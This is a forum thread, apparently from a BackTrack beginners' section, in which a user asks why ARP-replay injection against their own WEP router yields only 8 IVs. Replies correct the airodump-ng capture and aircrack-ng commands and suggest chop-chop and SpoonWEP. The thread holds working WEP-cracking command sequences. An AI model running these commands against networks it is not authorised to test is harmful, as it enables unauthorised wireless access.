Only 8 IV's in aireplay
Nomatter how many packets I inject into my own router, I just can't seem to get more than 8 IV's out of it with aireplay.
It's a 3com router with a wep crypt. if that information helps.
And i'm running it off my Acer aspire one. USB boot btw.
Here are the commands i've used:
Airmon-ng stop ath0
Airmon-ng start wifi0
Airodump-ng ath0
aireplay-ng -1 0 -e pjusken -a [AP mac] -h [my mac] ath0
Now I'm tild by aireplay that ath0 is on channel 3, and the AP is using 11.
Then I change to channel 11
airmon-ng stop ath0
airmon-ng start wifi0 11
aireplay-ng -1 0 -e pjusken -a [AP mac] -h [my mac] ath0
aireplay says:
18:18:20 Sending Authentication Request (open system) [ACK]
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-) (AID: 1)
So I start injecting
aireplay-ng -3 -b [AP mac] -h [my mac] ath0
I let it run until it's got about 25000 ARP's.
When I run aircrack i've only got 8 IV's. While aireplay is injecting airodump tells me the packets per second #/s only range from 1 to 10.
What could the reason be?
I'm reasonable new to BT, and Linux at all so i'm gonna need information easy too understand :P (posting in Newbie Area, d'uh). And pardon the spelling while i'm first at throwing excuses ^^
- Farnell
Are you using Back|Track 3?
If so, and if all you want to do is crack your WEP (and not learn), you can use SpoonWEP which is pre-loaded on BT3. It's a very nice tool created by a member here. There is an updated version, which is even nicer, called SpoonWEP 2 as well.
I understand if you're just trying to learn though. Other members should be able to assist you more than me.
Your airodump command is wrong. You should run airodump-ng -c <channel number of AP> -w <capture filename> ath0
The run aircrack-ng -0 -z <capture filename>
If you run aircrack-ng without doing it against the capture file, you will only show 8 IV's.
Only use the Standart ARP-Request Attack (-3) when there are active clients associated in the network. For environments without clients try the chop-chop approach instead!
So I start injecting
aireplay-ng -3 -b [AP mac] -h [my mac] ath0
Thanks a lot everyone.
I am currently using Backtrack 3. My intention was to learn linux so I think i'l stick to finding out whats wrong with the aircrack suite\me :P
I'l get to trying out the commands when I get some spare time on my hands.
If your intention was to "learn linux" then I am not sure how breaking your WEP key is a part of that. If your intention was to learn to use the aircrack-ng suite of tools then might I suggest you take a look at the WiFu course from Offensive Security.
Posting Permissions
